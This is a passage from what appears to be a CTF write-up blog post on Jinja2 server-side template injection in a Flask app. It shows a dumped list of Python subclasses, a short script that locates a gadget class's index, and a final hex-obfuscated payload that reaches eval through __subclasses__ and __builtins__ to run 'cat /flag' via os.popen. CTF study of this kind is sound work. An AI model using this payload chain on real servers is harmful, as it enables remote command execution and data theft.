;argparse.FileType'>, <class 'argparse._Act
ionsContainer'>, <class 'shlex.shlex'&g
t;, <class '_ssl._SSLContext'>, <class &
#39;_ssl._SSLSocket'>, <class '_ssl.MemoryB
IO'>, <class '_ssl.Session'>, <cl
ass 'ssl.SSLObject'>, <class 'gunicorn.
reloader.InotifyReloader'>, <class 'gunicor
n.config.Config'>, <class 'gunicorn.config.
Setting'>, <class 'gunicorn.debug.Spew'
>, <class 'gunicorn.app.base.BaseApplication&#3
9;>, <class '_pickle.Unpickler'>, <cl
ass '_pickle.Pickler'>, <class '_pickle
.Pdata'>, <class '_pickle.PicklerMemoProxy&
#39;>, <class '_pickle.UnpicklerMemoProxy'&
gt;, <class 'pickle._Framer'>, <class &#
39;pickle._Unframer'>, <class 'pickle._Pick
ler'>, <class 'pickle._Unpickler'>, 
<class '_queue.SimpleQueue'>, <class &#3
9;queue.Queue'>, <class 'queue._PySimpleQue
ue'>, <class 'logging.handlers.QueueListene
r'>, <class 'socketserver.BaseServer'&g
t;, <class 'socketserver.ForkingMixIn'>, &l
t;class 'socketserver.ThreadingMixIn'>, <cl
ass 'socketserver.BaseRequestHandler'>, <cl
ass 'logging.config.ConvertingMixin'>, <cla
ss 'logging.config.BaseConfigurator'>, <cla
ss 'gunicorn.glogging.Logger'>, <class &#39
;gunicorn.http.body.ChunkedReader'>, <class &#3
9;gunicorn.http.body.LengthReader'>, <class &#3
9;gunicorn.http.body.EOFReader'>, <class 'g
unicorn.http.body.Body'>, <class 'gunicorn.
http.message.Message'>, <class 'gunicorn.ht
tp.unreader.Unreader'>, <class 'gunicorn.ht
tp.parser.Parser'>, <class 'gunicorn.http.w
sgi.FileWrapper'>, <class 'gunicorn.http.ws
gi.Response'>, <class 'subprocess.Completed
Process'>, <class 'subprocess.Popen'&gt
;, <class 'gunicorn.workers.workertmp.WorkerTmp&#3
9;>, <class 'gunicorn.workers.base.Worker'&
gt;, <class 'email.message.Message'>, <c
lass 'email.generator.Generator'>, <class &
#39;_hashlib.HASH'>, <class '_blake2.blake2
b'>, <class '_blake2.blake2s'>, <
class '_sha3.sha3_224'>, <class '_sha3.
sha3_256'>, <class '_sha3.sha3_384'>
, <class '_sha3.sha3_512'>, <class '
_sha3.shake_128'>, <class '_sha3.shake_256&
#39;>, <class 'hmac.HMAC'>, <class &#
39;smtplib.SMTP'>, <class 'email.headerregi
stry.Address'>, <class 'email.headerregistr
y.Group'>, <class 'email.headerregistry.Uns
tructuredHeader'>, <class 'email.headerregi
stry.DateHeader'>, <class 'email.headerregi
stry.AddressHeader'>, <class 'email.headerr
egistry.MIMEVersionHeader'>, <class 'email.
headerregistry.ParameterizedMIMEHeader'>, <clas
s 'email.headerregistry.ContentTransferEncodingHeader
'>, <class 'email.headerregistry.MessageIDH
eader'>, <class 'email.headerregistry.Heade
rRegistry'>, <class 'email.contentmanager.C
ontentManager'>, <class 'typing._Final'
>, <class 'typing._Immutable'>, <clas
s 'typing.Generic'>, <class 'typing._Ty
pingEmpty'>, <class 'typing._TypingEllipsis
'>, <class 'typing.NamedTuple'>, &lt
;class 'typing.io'>, <class 'typing.re&
#39;>, <class 'markupsafe._MarkupEscapeHelper&#
39;>, <class 'http.client.HTTPConnection'&g
t;, <class 'mimetypes.MimeTypes'>, <clas
s 'werkzeug._internal._Missing'>, <class &#
39;werkzeug.exceptions.Aborter'>, <class 'w
erkzeug.urls.Href'>, <class 'urllib.request
.Request'>, <class 'urllib.request.OpenerDi
rector'>, <class 'urllib.request.BaseHandle
r'>, <class 'urllib.request.HTTPPasswordMgr
'>, <class 'urllib.request.AbstractBasicAut
hHandler'>, <class 'urllib.request.Abstract
DigestAuthHandler'>, <class 'urllib.request
.URLopener'>, <class 'urllib.request.ftpwra
pper'>, <class 'http.cookiejar.Cookie'&
gt;, <class 'http.cookiejar.CookiePolicy'>,
 <class 'http.cookiejar.Absent'>, <class
 'http.cookiejar.CookieJar'>, <class 'w
erkzeug.datastructures.ImmutableListMixin'>, <c
lass 'werkzeug.datastructures.ImmutableDictMixin'
>, <class 'werkzeug.datastructures._omd_bucket&
#39;>, <class 'werkzeug.datastructures.Headers&
#39;>, <class 'werkzeug.datastructures.Immutabl
eHeadersMixin'>, <class 'werkzeug.datastruc
tures.IfRange'>, <class 'werkzeug.datastruc
tures.Range'>, <class 'werkzeug.datastructu
res.ContentRange'>, <class 'werkzeug.datast
ructures.FileStorage'>, <class 'dataclasses
._HAS_DEFAULT_FACTORY_CLASS'>, <class 'data
classes._MISSING_TYPE'>, <class 'dataclasse
s._FIELD_BASE'>, <class 'dataclasses.InitVa
r'>, <class 'dataclasses.Field'>, &l
t;class 'dataclasses._DataclassParams'>, <c
lass 'werkzeug.sansio.multipart.Event'>, <c
lass 'werkzeug.sansio.multipart.MultipartDecoder'
>, <class 'werkzeug.sansio.multipart.MultipartE
ncoder'>, <class 'werkzeug.wsgi.ClosingIter
ator'>, <class 'werkzeug.wsgi.FileWrapper&#
39;>, <class 'werkzeug.wsgi._RangeWrapper'&
gt;, <class 'werkzeug.utils.HTMLBuilder'>, 
<class 'werkzeug.wrappers.accept.AcceptMixin'&
gt;, <class 'werkzeug.wrappers.auth.AuthorizationM
ixin'>, <class 'werkzeug.wrappers.auth.WWWA
uthenticateMixin'>, <class '_json.Scanner&#
39;>, <class '_json.Encoder'>, <class
 'json.decoder.JSONDecoder'>, <class 'j
son.encoder.JSONEncoder'>, <class 'werkzeug
.formparser.FormDataParser'>, <class 'werkz
eug.formparser.MultiPartParser'>, <class 'w
erkzeug.user_agent.UserAgent'>, <class 'wer
kzeug.useragents._UserAgentParser'>, <class &#3
9;werkzeug.sansio.request.Request'>, <class &#3
9;werkzeug.wrappers.request.StreamOnlyMixin'>, &lt
;class 'werkzeug.sansio.response.Response'>, &
lt;class 'werkzeug.wrappers.response.ResponseStream&#
39;>, <class 'werkzeug.wrappers.response.Respon
seStreamMixin'>, <class 'werkzeug.wrappers.
common_descriptors.CommonRequestDescriptorsMixin'>
, <class 'werkzeug.wrappers.common_descriptors.Com
monResponseDescriptorsMixin'>, <class 'werk
zeug.wrappers.etag.ETagRequestMixin'>, <class &
#39;werkzeug.wrappers.etag.ETagResponseMixin'>, &l
t;class 'werkzeug.wrappers.user_agent.UserAgentMixin&
#39;>, <class 'werkzeug.test._TestCookieHeaders
'>, <class 'werkzeug.test._TestCookieRespon
se'>, <class 'werkzeug.test.EnvironBuilder&
#39;>, <class 'werkzeug.test.Client'>, &
lt;class 'decimal.Decimal'>, <class 'de
cimal.Context'>, <class 'decimal.SignalDict
Mixin'>, <class 'decimal.ContextManager&#39
;>, <class 'numbers.Number'>, <class 
'uuid.UUID'>, <class 'jinja2.bccache.Bu
cket'>, <class 'jinja2.bccache.BytecodeCach
e'>, <class 'jinja2.utils.MissingType'&
gt;, <class 'jinja2.utils.LRUCache'>, <c
lass 'jinja2.utils.Cycler'>, <class 'ji
nja2.utils.Joiner'>, <class 'jinja2.utils.N
amespace'>, <class 'jinja2.nodes.EvalContex
t'>, <class 'jinja2.nodes.Node'>, &l
t;class 'jinja2.visitor.NodeVisitor'>, <cla
ss 'jinja2.idtracking.Symbols'>, <class &#3
9;jinja2.compiler.MacroRef'>, <class 'jinja
2.compiler.Frame'>, <class 'jinja2.runtime.
TemplateReference'>, <class 'jinja2.runtime
.Context'>, <class 'jinja2.runtime.BlockRef
erence'>, <class 'jinja2.runtime.LoopContex
t'>, <class 'jinja2.runtime.Macro'>,
 <class 'jinja2.runtime.Undefined'>, <cl
ass 'jinja2.lexer.Failure'>, <class 'ji
nja2.lexer.TokenStreamIterator'>, <class 'j
inja2.lexer.TokenStream'>, <class 'jinja2.l
exer.Lexer'>, <class 'jinja2.parser.Parser&
#39;>, <class 'jinja2.environment.Environment&#
39;>, <class 'jinja2.environment.Template'&
gt;, <class 'jinja2.environment.TemplateModule&#39
;>, <class 'jinja2.environment.TemplateExpressi
on'>, <class 'jinja2.environment.TemplateSt
ream'>, <class 'jinja2.loaders.BaseLoader&#
39;>, <class 'werkzeug.local.Local'>, &l
t;class 'werkzeug.local.LocalStack'>, <clas
s 'werkzeug.local.LocalManager'>, <class &#
39;werkzeug.local._ProxyLookup'>, <class 'w
erkzeug.local.LocalProxy'>, <class 'difflib
.SequenceMatcher'>, <class 'difflib.Differ&
#39;>, <class 'difflib.HtmlDiff'>, <c
lass 'werkzeug.routing.RuleFactory'>, <clas
s 'werkzeug.routing.RuleTemplate'>, <class 
'werkzeug.routing.BaseConverter'>, <class &
#39;werkzeug.routing.Map'>, <class 'werkzeu
g.routing.MapAdapter'>, <class 'click._comp
at._FixupStream'>, <class 'click._compat._A
tomicFile'>, <class 'click.utils.LazyFile&#
39;>, <class 'click.utils.KeepOpenFile'>
, <class 'click.utils.PacifyFlushWrapper'>,
 <class 'click.types.ParamType'>, <class
 'click.parser.Option'>, <class 'click.
parser.Argument'>, <class 'click.parser.Par
singState'>, <class 'click.parser.OptionPar
ser'>, <class 'click.formatting.HelpFormatt
er'>, <class 'click.core.Context'>, 
<class 'click.core.BaseCommand'>, <class
 'click.core.Parameter'>, <class 'flask
.signals.Namespace'>, <class 'flask.signals
._FakeSignal'>, <class 'flask.cli.Dispatchi
ngApp'>, <class 'flask.cli.ScriptInfo'&
gt;, <class 'flask.config.ConfigAttribute'>
, <class 'flask.ctx._AppCtxGlobals'>, <c
lass 'flask.ctx.AppContext'>, <class 'f
lask.ctx.RequestContext'>, <class 'flask.sc
affold.Scaffold'>, <class 'itsdangerous._js
on._CompactJSON'>, <class 'itsdangerous.sig
ner.SigningAlgorithm'>, <class 'itsdangerou
s.signer.Signer'>, <class 'itsdangerous.ser
ializer.Serializer'>, <class 'flask.json.ta
g.JSONTag'>, <class 'flask.json.tag.TaggedJ
SONSerializer'>, <class 'flask.sessions.Ses
sionInterface'>, <class 'flask.blueprints.B
lueprintSetupState'>, <class 'unicodedata.U
CD'>
'''
a = a.replace('\n', '')
print()
b = a.split('>, <')
for i in range(len(b)):
    if b[i].find('codecs.IncrementalEncoder') != -1:
        print(i)
        break

最终payload:

{{()|attr("\x5f\x5fc\x6cass\x5f\x5f")|attr("\x5f\x5fb\x61ses\x5f\x5f")|attr("\x5f\x5f\x73\x75\x62cl\x61ss\x65s\x5f\x5f")()|attr("\x5f\x5fge\x74item\x5f\x5f")(98)|attr("\x5f\x5finit\x5f\x5f")|attr("\x5f\x5fglob\x61ls\x5f\x5f")|attr("\x5f\x5fge\x74item\x5f\x5f")("\x5f\x5fb\x75\x69ltins\x5f\x5f")|attr("\x5f\x5fge\x74item\x5f\x5f")("ev\x61l")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x22\x6f\x73\x22\x29\x2e\x70\x6f\x70\x65\x6e\x28\x22\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x22\x29\x2e\x72\x65\x61\x64\x28\x29")}}
go sql注入smtpwget内存马
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																					

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇